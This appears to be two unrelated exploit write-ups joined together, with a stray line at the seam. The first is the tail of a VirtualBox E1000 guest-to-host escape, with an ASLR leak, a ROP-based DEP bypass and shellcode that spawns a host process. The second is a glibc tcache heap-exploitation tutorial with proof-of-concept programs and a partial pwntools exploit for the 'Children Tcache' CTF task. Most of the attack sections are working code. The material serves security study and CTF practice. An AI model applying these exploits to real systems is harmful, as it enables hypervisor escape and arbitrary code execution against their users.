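/* Combine 8 bytes leaked lowest-address-first into a little-endian pointer. */
uint64_t assemble_le64(const uint8_t bytes[8])
{
    assert(bytes != NULL);
    uint64_t value = 0;
    for (size_t i = 0; i < 8; i++)
        value |= (uint64_t)bytes[i] << (8 * i);
    return value;
}

/* Subtract the known RVA from the leaked pointer to get the image base. */
uint64_t image_base(uint64_t leaked_ptr, uint64_t rva)
{
    assert(leaked_ptr >= rva);
    return leaked_ptr - rva;
}
```

For the bytes c6 cd 6e 4d c4 7f 00 00 this yields the pointer 0x00007fc44d6ecdc6 and, after subtracting the RVA, the base 0x00007fc44d4f3000 shown by vmmap.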

Information Leak

Now we combine the write and read primitives and use them to bypass ASLR. We overflow the heap, overwriting the EEPROM93C46 structure, then trigger the EEPROM finite automaton to write the index into the ACPIState structure, and then execute INB(0x4107) in the guest to access ACPI and read one byte of the pointer. These steps are repeated 8 times, incrementing the index by 1 each time.

uint64_t stage_1_main(void* mmio, void* tx_ring) {
    printk(KERN_INFO PFX"##### Stage 1 #####\n");

    // When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor 
    // is sent back to the guest and handled right now via e1kHandleRxPacket.
    // When loopback mode is disabled data is sent to a network as usual.
    // We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer
    // in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and 
    // the stack buffer.
    e1000_disable_loopback_mode(mmio);

    uint8_t leaked_bytes[8];
    uint32_t i;
    for (i = 0; i < 8; i++) {
        stage_1_overflow_heap_buffer(mmio, tx_ring, i);
        leaked_bytes[i] = stage_1_leak_byte();

        printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]);
    }

    uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes;
    uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA;
    printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr);
    printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base);

    return vboxdd_base;
}

As mentioned, certain E1000 registers have to be configured so that the integer underflow does not lead to the stack buffer overflow. The idea is that the stack buffer is overflowed in the e1kHandleRxPacket function, which is called while handling Tx descriptors in loopback mode. Indeed, in loopback mode the guest sends network packets to itself, so they are received right after being sent. We disable this mode so that e1kHandleRxPacket is unreachable.

DEP Bypass

We have bypassed ASLR. Now the loopback mode can be enabled and the stack buffer overflow can be triggered.

void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    off_t buffer_pa;
    void* buffer_va;
    alloc_buffer(&buffer_pa, &buffer_va);

    stage_2_set_up_buffer(buffer_va, vboxdd_base);
    stage_2_trigger_overflow(mmio, tx_ring, buffer_pa);

    free_buffer(buffer_va);
}

void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    printk(KERN_INFO PFX"##### Stage 2 #####\n");

    e1000_enable_loopback_mode(mmio);
    stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base);
    e1000_disable_loopback_mode(mmio);
}

Now, when the last instruction of e1kHandleRxPacket is executed, the saved return address has been overwritten and control is transferred anywhere the attacker wants. But DEP is still there. It is bypassed in the classic way, by building a ROP chain. The ROP gadgets allocate executable memory, copy a shellcode loader into it, and execute it.

Shellcode

The shellcode loader is trivial. It copies the beginning of the overflowing buffer next to it.

use64

start:
    lea rsi, [rsp - 0x4170];
    push rax
    pop rdi
    add rdi, loader_size
    mov rcx, 0x800
    rep movsb
    nop

payload:
    ; Here the shellcode is to be

loader_size = $ - start

The shellcode is executed. Its first part is:

use64

start:
    ; sys_vfork (syscall 58 on x86_64; plain fork is 57)
    mov rax, 58
    syscall

    test rax, rax
    jnz continue_process_execution

    ; Initialize argv
    lea rsi, [cmd]
    mov [argv], rsi

    ; Initialize envp
    lea rsi, [env]
    mov [envp], rsi

    ; sys_execve
    lea rdi, [cmd]
    lea rsi, [argv]
    lea rdx, [envp]
    mov rax, 59
    syscall

...

cmd     db '/usr/bin/xterm', 0
env     db 'DISPLAY=:0.0', 0
argv    dq 0, 0
envp    dq 0, 0

It forks and calls execve to create a /usr/bin/xterm process. The attacker gains control over the host’s ring 3.

Process Continuation

I believe every exploit should be finished. That means it should not crash the application, though that’s not always possible, of course. We need the virtual machine to continue execution, which is achieved by the second part of the shellcode.

continue_process_execution:
    ; Restore RBP
    mov rbp, rsp
    add rbp, 0x48

    ; Skip junk
    add rsp, 0x10

    ; Restore the registers that must be preserved according to System V ABI
    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15

    ; Skip junk
    add rsp, 0x8

    ; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
    ; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
    ; After:    "E1000-Xmit" -> NULL

    ; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv"
    ; This was unnecessary on my testing machines but to be sure...
    mov rdi, [rbx]
    mov rax, 0x0
    mov rcx, 0xA0
    rep stosb

    ; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit"
    ; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1") 
    ; will be corrupted in MMHyperFree
    mov qword [rbx], 0x0

    ; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted

    ret

When e1kHandleRxPacket is called, the call stack is:

#0 e1kHandleRxPacket
#1 e1kTransmitFrame
#2 e1kXmitDesc
#3 e1kXmitPacket
#4 e1kXmitPending
#5 e1kR3NetworkDown_XmitPending
...

We’ll jump right to e1kR3NetworkDown_XmitPending which does nothing more and returns to a hypervisor function.

static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface)
{
    PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown);
    /* Resume suspended transmission */
    STATUS &= ~STATUS_TXOFF;
    e1kXmitPending(pThis, true /*fOnWorkerThread*/);
}

The shellcode sets RBP to RSP + 0x48 to make it what it should be in e1kR3NetworkDown_XmitPending. Next, the registers RBX, R12, R13, R14, R15 are restored from the stack, because the System V ABI requires a callee function to preserve them. If they aren’t restored, the hypervisor will crash because of invalid pointers in them.

That could be enough, because the virtual machine no longer crashes and continues to execute. But there will be an access violation in the PDMR3QueueDestroyDevice function when the VM is shut down. The reason is that when the heap is overflowed, an important structure, PDMQUEUE, is overwritten. Furthermore, it’s overwritten by the last two ROP gadgets, i.e. the last 16 bytes. I tried to reduce the ROP chain size and failed, but when I replaced the data manually the hypervisor was still crashing. This meant the obstacle was not as obvious as it seemed.

The data structure being overwritten is a linked list. The overwritten data is in the second-to-last list element; its next pointer is overwritten. The remedy turned out to be simple:

; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
; After:    "E1000-Xmit" -> NULL

Getting rid of the last two elements allows the virtual machine to shut down smoothly.

Demo

https://vimeo.com/299325088

children tcache which is one NULL byte buffer overflow on the heap


This article is intended for the people who already have some knowledge about heap exploitation. If you already know some heap attacks on glibc<2.26 it’ll be fully understandable to you. But if you don’t, don’t worry — I’ve tried to make this post approachable for everyone with just basic knowledge. If you really know nothing about the topic, I recommend heap-exploitation.

Tcache is an internal mechanism responsible for heap management. It was introduced in glibc 2.26 in 2017. Its objective is to speed up heap management. The older algorithms have not been removed; they are still used in some cases, for example for bigger chunks or when the appropriate tcache bin is full. But heap exploitation with this mechanism is a lot easier due to a lack of heap integrity checks.

In this post, the pointer to the next chunk is called fd and the pointer to the previous chunk is called bk, as in a normal heap chunk.

Tcache overview

You can grab glibc 2.26 from here. All the source code that interests us is located in the file malloc/malloc.c.

In this version of glibc two new functions were created:

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

Both of these functions can be called at the beginning of the functions _int_free and __libc_malloc. tcache_put is called when the requested size of the allocated region is not greater than 0x408 and the tcache bin appropriate for the given size is not full. The maximum number of chunks in one tcache bin is mp_.tcache_count, and this variable is set to 7 by default. The default comes from the following piece of code:

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

tcache_get is called when we request a chunk whose size matches a tcache bin and that bin contains some chunks. Every tcache bin contains chunks of only one size. From the code above we can see that it is a singly linked list, similar to a fastbin: it contains only a pointer to the next chunk. The list is also LIFO, as in fastbins. But there is a difference: each tcache bin remembers how many chunks belong to it in the variable tcache->counts[tc_idx].
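The behaviour described above can be mimicked with a few lines of Python. This is only a toy model, not glibc code: the class name TcacheBin and its methods are made up for illustration, and a Python list stands in for the singly linked list. It shows the LIFO order and the per-bin counter capped at 7.

```python
# Toy model of one tcache bin: a LIFO list plus a counter.
# Illustration only; the names below are hypothetical, not glibc identifiers.
TCACHE_FILL_COUNT = 7  # default value of mp_.tcache_count


class TcacheBin:
    def __init__(self):
        self.entries = []   # the last element plays the role of the list head
        self.count = 0      # mirrors tcache->counts[tc_idx]

    def put(self, chunk):
        """Model of free(): returns False when the bin is full, i.e. when
        the chunk would be handed to the older bins instead."""
        if self.count >= TCACHE_FILL_COUNT:
            return False
        self.entries.append(chunk)
        self.count += 1
        return True

    def get(self):
        """Model of malloc(): returns the most recently freed chunk, or
        None when the bin is empty."""
        if not self.entries:
            return None
        self.count -= 1
        return self.entries.pop()


bin_0x60 = TcacheBin()
for addr in (0x555555559670, 0x5555555596d0):
    bin_0x60.put(addr)

first = bin_0x60.get()
print(hex(first))  # the chunk that was freed last comes back first
```

The eighth put on a bin returns False in this model, which corresponds to a freed chunk bypassing the tcache once the bin holds 7 entries.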

Strangely, calloc doesn’t allocate from the tcache bins.

If you want to test how tcache behaves, you can use pwndbg and compile malloc_playground.

a@x:~/Desktop/how2heap_mycp$ gdb -q ./mp
pwndbg: loaded 170 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)


Reading symbols from ./mp...(no debugging symbols found)...done.
pwndbg> r
Starting program: /home/a/Desktop/how2heap_mycp/mp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
> malloc 0x50
==> 0x555555559670
> malloc 0x50
==> 0x5555555596d0
> malloc 0x61
==> 0x555555559730
> free 0x555555559670
==> ok
> free 0x5555555596d0
==> ok
> free 0x555555559730
==> ok
> ^C
Program received signal SIGINT, Interrupt.
[...]
pwndbg> bins
tcachebins
0x60 [  2]: 0x5555555596d0 —▸ 0x555555559670 ◂— 0x0
0x70 [  1]: 0x555555559730 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
pwndbg> 
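To see why malloc(0x50) ends up in the 0x60 bin and malloc(0x61) in the 0x70 bin in the session above, here is a sketch of the size arithmetic. The function names follow the request2size and csize2tidx macros in malloc.c, but this is a Python restatement, and the constants are assumptions for x86-64.

```python
SIZE_SZ = 8                  # sizeof(size_t), assumed x86-64
MALLOC_ALIGNMENT = 16
MALLOC_ALIGN_MASK = MALLOC_ALIGNMENT - 1
MINSIZE = 32                 # smallest possible chunk, assumed x86-64
TCACHE_MAX_BINS = 64


def request2size(req):
    """Chunk size (header included) that malloc(req) works with."""
    if req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE:
        return MINSIZE
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK


def csize2tidx(chunk_size):
    """Index of the tcache bin that serves chunks of this size."""
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT


def uses_tcache(req):
    """True when a request of this size is eligible for a tcache bin."""
    return csize2tidx(request2size(req)) < TCACHE_MAX_BINS


for req in (0x50, 0x61, 0x408, 0x409):
    size = request2size(req)
    print(hex(req), hex(size), csize2tidx(size), uses_tcache(req))
```

Under these assumptions 0x408 is the largest request that still maps to a tcache bin, which matches the limit quoted earlier.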

Tcache attacks

Due to a lack of integrity checks in tcache, many attacks are easier.

double free

Let’s consider a double free vulnerability as a first example:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	char *a = malloc(0x38);
	free(a);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

As a result, we get the same pointer twice.

On older glibc (<2.26), getting the same result is a bit more complicated:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%s","hello\n");
	char *a = malloc(0x38);
	char *b = malloc(0x38);
	free(a);
	free(b);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

output:

hello
0x602420
0x602460
0x602420

We additionally need to free another chunk in between because of this integrity check: we cannot add a chunk to a fastbin list when the same chunk is already at the top of that list. printf is called at the beginning because the program crashes otherwise. This is probably because the first call to printf initializes its buffer by mallocing some memory.
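The difference between the two free paths can be sketched as follows. This is a simplified model under my own naming (fastbin_free, tcache_free and DoubleFreeDetected are hypothetical): Python lists replace the linked lists, and the 7-chunk tcache limit is left out.

```python
class DoubleFreeDetected(Exception):
    """Stands in for glibc aborting on a detected fastbin double free."""


def fastbin_free(fastbin, chunk):
    # Fastbin path: the chunk is only compared with the current list head.
    if fastbin and fastbin[-1] == chunk:
        raise DoubleFreeDetected(hex(chunk))
    fastbin.append(chunk)


def tcache_free(tcache_bin, chunk):
    # glibc 2.26 tcache path: no comparison at all.
    tcache_bin.append(chunk)


a, b = 0x602420, 0x602460             # addresses from the output above

fastbin = []
fastbin_free(fastbin, a)
try:
    fastbin_free(fastbin, a)          # a is already on top: detected
    direct_double_free_ok = True
except DoubleFreeDetected:
    direct_double_free_ok = False

fastbin_free(fastbin, b)              # put another chunk on top ...
fastbin_free(fastbin, a)              # ... and the second free(a) passes
served = [fastbin.pop() for _ in range(3)]

tcache_bin = []
tcache_free(tcache_bin, a)
tcache_free(tcache_bin, a)            # accepted immediately
print([hex(x) for x in served], [hex(x) for x in tcache_bin])
```

The three simulated allocations come back in the order a, b, a, the same order as in the program output above.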

House of Spirit

House of Spirit is also super easy:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long int var[10];
	var[1] = 0x40; // set the size of the chunk to 0x40

	free(&var[2]);
	char *a=malloc(0x38);
	printf("%p %p\n",a ,&var[2]);
}

output:

0x7fff899700c0 0x7fff899700c0

By freeing a region that was never allocated, we put it in the tcache bin list. We can then obtain this region when malloc is called with an appropriate size as an argument. This is useful when we are able to overwrite some pointer through a buffer overflow.
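As a rough illustration of why the fake chunk is accepted, the sketch below lays out var[10] as raw bytes and reads the size field the way free() would locate it. The 16-byte header and the index formula are assumptions for x86-64; the helper name tcache_index is made up.

```python
import struct

stack = bytearray(10 * 8)                    # long int var[10]
struct.pack_into("<Q", stack, 1 * 8, 0x40)   # var[1] = 0x40

mem_offset = 2 * 8                 # &var[2], the pointer passed to free()
chunk_offset = mem_offset - 16     # the chunk header starts 16 bytes earlier
size_field = struct.unpack_from("<Q", stack, chunk_offset + 8)[0]
chunk_size = size_field & ~0x7     # drop the three flag bits


def tcache_index(size):
    """Bin index for a chunk size (assumed MINSIZE 32, alignment 16)."""
    return (size - 32 + 15) // 16


freed_idx = tcache_index(chunk_size)
# malloc(0x38) is rounded up to a 0x40-byte chunk, so it uses the same bin
request_idx = tcache_index((0x38 + 8 + 15) & ~15)
print(hex(chunk_size), freed_idx, request_idx)
```

Both indices are equal, so in this model the fake chunk lands in exactly the bin that the following malloc(0x38) reads from.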

In older glibc we needed to put in more effort due to this check. We need to create another fake chunk after the freed one. Like here.

tcache/fastbin poisoning

If we want to exploit malloc to return a pointer to a controlled location, we can simply overwrite the pointer to the next chunk. We can forget about this integrity check from the older mechanism:

#include <stdlib.h>
#include <stdio.h>

char var[]="aaaaaaaaaaaaaaa";

int main()
{
	long *a = malloc(0x38);
	long *b = malloc(0x38);
	free(a);
	free(b);
	// tcache bin for 0x40-byte chunks contains: b -> a 
	b[0] = (long)&var;
	// tcache bin for 0x40-byte chunks contains: b -> var
	malloc(0x38);
	// tcache bin for 0x40-byte chunks contains: var
	char *c=malloc(0x38);
	printf("%s\n",c);
}

output:

aaaaaaaaaaaaaaa

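We free two chunks here so that tcache->counts stays consistent with the allocations that follow, because each tcache bin remembers how many chunks belong to it. As far as I can tell, __libc_malloc in glibc 2.26 only checks that the head pointer of the bin is non-NULL, so freeing a single chunk would probably work as well on that version.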
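The pointer overwrite can be traced with a small model in which the next pointer lives inside the freed chunk itself. Everything here is illustrative: the dictionary memory, the addresses and the function names are assumptions, and the per-bin counter is ignored.

```python
NULL = 0
memory = {}      # address -> the 8 bytes stored at the start of that chunk
head = NULL      # plays the role of tcache->entries[tc_idx]


def free(addr):
    """tcache_put: link the chunk in front of the current head."""
    global head
    memory[addr] = head
    head = addr


def malloc():
    """tcache_get: hand out the head and follow its next pointer."""
    global head
    addr = head
    if addr == NULL:
        return None          # real malloc would use the older bins here
    head = memory.get(addr, NULL)
    return addr


a, b = 0x1000, 0x1040        # hypothetical heap addresses
var = 0x601040               # hypothetical address of the global buffer

free(a)
free(b)                      # bin: b -> a
memory[b] = var              # the overwrite b[0] = &var; bin: b -> var
first = malloc()             # returns b; bin: var
second = malloc()            # returns var
print(hex(first), hex(second))
```

The second allocation returns the address of var although var was never a heap chunk, which is the whole point of the attack.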

libc leak

If we want to leak the libc address on glibc 2.26 we can do this:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long *a = malloc(0x1000);
	malloc(0x10);
	free(a);
	printf("%p\n", (void *)a[0]);
}  

This program prints the fd of the chunk inside the unsorted bin. The fd of the last chunk and the bk of the first chunk in the unsorted bin point into libc. The malloc(0x10) call keeps a from being merged into the top chunk when it is freed.

If we can only request at most 0x100 bytes from malloc, this won’t work, because the freed chunk goes to a tcache bin rather than to the unsorted bin. It works only with older glibc:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	free(a);
	printf("%p\n", (void *)a[0]);
}

Fortunately, if we make the tcache bin full (its maximum capacity is 7 chunks), the deallocated chunk will be put in the unsorted bin:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long* t[7];
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	
	// make tcache bin full
	for(int i=0;i<7;i++)
		t[i]=malloc(0x100);
	for(int i=0;i<7;i++)
		free(t[i]);
	
	free(a);
	// a is put in an unsorted bin because the tcache bin of this size is full
	printf("%p\n", (void *)a[0]);
} 

tcache attacks summary

More attacks exist for glibc with tcache. For example, House of Force works the same way as before. It is also easy to create overlapping chunks by overwriting the size with a bigger value. After tcache was introduced, heap exploitation became much easier. The exception is a buffer overflow by a single NULL byte, as in the Children Tcache CTF task. There I used an old attack with chunks of smallbin size and prevented them from going into the tcache by making the tcache bins full.

Children Tcache overview

In this task we have 2 binaries: task and libc

The version of libc is 2.27 but there is no difference between 2.26 and 2.27 for us:

a@x:~/Desktop/children_tcache$ strings libc.so.6 | grep LIBC
[...]
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.

The decompiled binary looks like this:

unsigned __int64 new_heap()
{
  signed int i; // [rsp+Ch] [rbp-2034h]
  char *ptr; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s; // [rsp+20h] [rbp-2020h]
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&s, 0, 0x2010uLL);
  for ( i = 0; ; ++i )
  {
    if ( i > 9 )
    {
      puts(":(");
      return __readfsqword(0x28u) ^ v5;
    }
    if ( !pointers[i] )
      break;
  }
  printf("Size:");
  size = read_atoll();
  if ( size > 0x2000 )
    exit(-2);
  ptr = (char *)malloc(size);
  if ( !ptr )
    exit(-1);
  printf("Data:");
  read_data((__int64)&s, size);
  strcpy(ptr, &s);
  pointers[i] = ptr;
  sizes[i] = size;
  return __readfsqword(0x28u) ^ v5;
}

int show_heap()
{
  const char *v0; // rax
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v2 = read_atoll();
  if ( v2 > 9 )
    exit(-3);
  v0 = pointers[v2];
  if ( v0 )
    LODWORD(v0) = puts(pointers[v2]);
  return (signed int)v0;
}

int delete_heap()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v1 = read_atoll();
  if ( v1 > 9 )
    exit(-3);
  if ( pointers[v1] )
  {
    memset((void *)pointers[v1], 0xDA, sizes[v1]);
    free((void *)pointers[v1]);
    pointers[v1] = 0LL;
    sizes[v1] = 0LL;
  }
  return puts(":)");
}

TL;DR:

We can

  • create chunk on the heap and read data into it
  • delete a chunk
  • print data in a chunk

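Everything is fine except the new_heap function, which is vulnerable to a buffer overflow by a single NULL byte: strcpy appends a terminating NULL, so when the data fills all size bytes, the NULL lands one byte past the requested size. Before free, the area is filled with 0xDA bytes. We can have at most 10 chunks allocated at the same time, and the maximum requested size of a chunk is 0x2000.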

In older versions of glibc, this attack works:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // allocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c has prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of  a|b|c
    char *A = malloc(0x108);
    char *B = malloc(0xF8);
    printf("A: %p\n",A); 
    printf("B: %p\n",B);

    free(b);
    // leak libc
    printf("B content: %p\n", (void *)((long*)B)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B: 0x602120
B content: 0x7ffff7dd1b78

Normally, when we free a chunk of smallbin size, there is a check whether its neighbour is free. If so, the two are consolidated. When we free chunk c, it consolidates with a and b for 2 reasons:

  • We have cleared the PREV_INUSE bit of chunk c so it thinks that its previous neighbour is freed.
  • We have set prev_size of chunk c to value 0x210 which is a total size of chunks a and b.
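The two conditions in the list above boil down to simple address arithmetic. The sketch below redoes it with the addresses printed by the example; the 0x10-byte header and the chunk sizes 0x110 and 0x100 are assumptions for x86-64, and the variable names are mine.

```python
HEADER = 0x10     # prev_size and size fields precede the user pointer

a_mem, b_mem = 0x602010, 0x602120     # addresses printed by the example
a_chunk = a_mem - HEADER
b_chunk = b_mem - HEADER
a_size = 0x110                        # assumed chunk size for malloc(0x108)
b_size = 0x100                        # assumed chunk size for malloc(0xf8)
c_size = 0x100                        # assumed chunk size for malloc(0xf8)
c_chunk = b_chunk + b_size

prev_size = 0x210                     # value written at b+0xf0
prev_inuse = 0                        # cleared by the NULL byte at b[0xf8]

# free(c): when PREV_INUSE is clear, step back prev_size bytes and merge
if prev_inuse:
    merged_start, merged_size = c_chunk, c_size
else:
    merged_start, merged_size = c_chunk - prev_size, c_size + prev_size

print(hex(c_chunk), hex(merged_start), hex(merged_size))
```

With these numbers the merged chunk starts exactly at the header of a, and b+0xf0 coincides with the prev_size field of c, which is why writing through b is enough to steer the consolidation.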

This attack can be shorter:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // allocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c has prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A); 

    // leak libc
    printf("B content: %p\n", (void *)((long*)b)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B content: 0x7ffff7dd1b78

In the end, we skipped the allocation and deletion of chunk B because they are not needed. After c is freed, the unsorted bin holds one chunk that covers the combined areas of a, b and c. When we allocate chunk A, that chunk is split into 2 parts. One part is returned by malloc; the other part remains in the unsorted bin and begins at the same address as b.

In our examples, the first allocated chunk has a different size from the others: 0x108. The example would also work with 0xf8, but this challenge uses strcpy, which stops at a NULL byte, so we could not write the value 0x200 into prev_size. With a size of 0x108 we can set prev_size to 0x210.
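The strcpy constraint is easy to check: packed as a little-endian 64-bit value, 0x200 begins with a NULL byte, while 0x210 does not. A minimal sketch, where strcpy_bytes is a made-up helper that returns what strcpy would actually copy:

```python
import struct


def strcpy_bytes(data):
    """Bytes strcpy() would write: everything before the first NULL byte,
    followed by the terminating NULL."""
    return data.split(b"\x00", 1)[0] + b"\x00"


for prev_size in (0x200, 0x210):
    wanted = struct.pack("<Q", prev_size)     # little-endian prev_size field
    copied = strcpy_bytes(wanted)
    print(hex(prev_size), wanted.hex(), len(copied) - 1, "payload bytes copied")
```

For 0x200 no payload byte gets through at all, whereas for 0x210 the two significant bytes 0x10 0x02 are copied before strcpy stops.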

We can accomplish the same attack on a newer libc by using the same algorithm. But there is one difference: before freeing chunks we need to make the tcache bins full. The attack below performs the same leak as the previous one, but it also goes further. After the leak, it causes a double free because B and b point to the same chunk of size 0x1f8. Later, the tcache poisoning attack described above is performed.

#include<stdlib.h>
#include<stdio.h>
 
char* tcache1[7]; 
char* tcache2[7]; 
 
long var;
 
int main()
{
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);
	

    printf("a: %p\n",a);
    printf("b: %p\n",b); 
    printf("c: %p\n",c);

    // make 0xf8 tcache full
    for(int i=0;i<7;i++)
        tcache1[i]=malloc(0xF8);
    for(int i=0;i<7;i++)
        free(tcache1[i]);

    // make 0x108 tcache full
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    free(a); // a goes to an unsorted bin

    tcache1[0]=malloc(0xF8);//creates one free place in 0xf8 tcache 
    // b will go to tcache after free(). 

    // in the CTF task we can only write data to chunks
    // right after mallocing this chunk
    free(b);
    b = malloc(0xf8);
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    printf("b: %p\n",b);
   
    // make 0xf8 tcache full
    free(tcache1[0]);

    // c has prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);
    
    // make 0x108 tcache empty
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);


    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A);

    // leak libc
    printf("b content: %p\n", (void *)((long*)b)[0]);

    // make 0x108 tcache full because we can have max 10 chunks allocated 
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    // Both 0xf8 and 0x108 tcache bins are full

    // let's allocate chunk that overlaps b.
    char *B = malloc(0x1F8);
    printf("B: %p\n",B);

    // now, chunks B and b are allocated and have the same address. 
    // now we can use double free and tcache poisoning attack

    // double free
    free(B);
    free(b);
    // now the 0x1F8 tcache bin contains the same chunk twice

    // allocate one of them and set next pointer to known address
    b = malloc(0x1F8);
    *(long*)(b) = (long)&var;
    
    malloc(0x1F8);
	
    // the allocated chunk will have an address of variable var
    char *super_pointer = malloc(0x1F8);
	
    printf("%p %p\n",super_pointer,&var);
}

output:

a: 0x55c054fa2260
b: 0x55c054fa2370
c: 0x55c054fa2470
b: 0x55c054fa2370
A: 0x55c054fa2260
b content: 0x7f60c1026ca0
B: 0x55c054fa2370
0x55c053972060 0x55c053972060

And the last step is to implement the exploit in Python. It does the same thing as the previous code, except that malloc returns a region at &__free_hook. We then overwrite __free_hook with the address of a one-gadget RCE, and finally call free to trigger it.

from pwn import *

r = remote("localhost", 1337)
#r = remote("54.178.132.125",8763)
pointers = [False]*10

def menu():
    print r.recvuntil("choice: ") 

def new_heap(size, data):
    #find idx
    global pointers
    idx = None
    for i in range(10):
        if not pointers[i]:
            pointers[i] = True
            idx = i
            break
    assert(idx is not None)
	
    r.send("1")
    print r.recvuntil("Size:")
    r.send(str(size))
    print r.recvuntil("Data:")
    r.send(data)
    menu()
    return idx
	
def show_heap(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
	
def show_heap_leak(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    data = r.recvuntil("choice: ")
    addr = data.split("\n")[0]
    addr = addr.ljust(8,"\x00")
    return u64(addr)
	
	
def delete_heap(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
    return None
	
def delete_heap_and_shell(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    r.interactive()

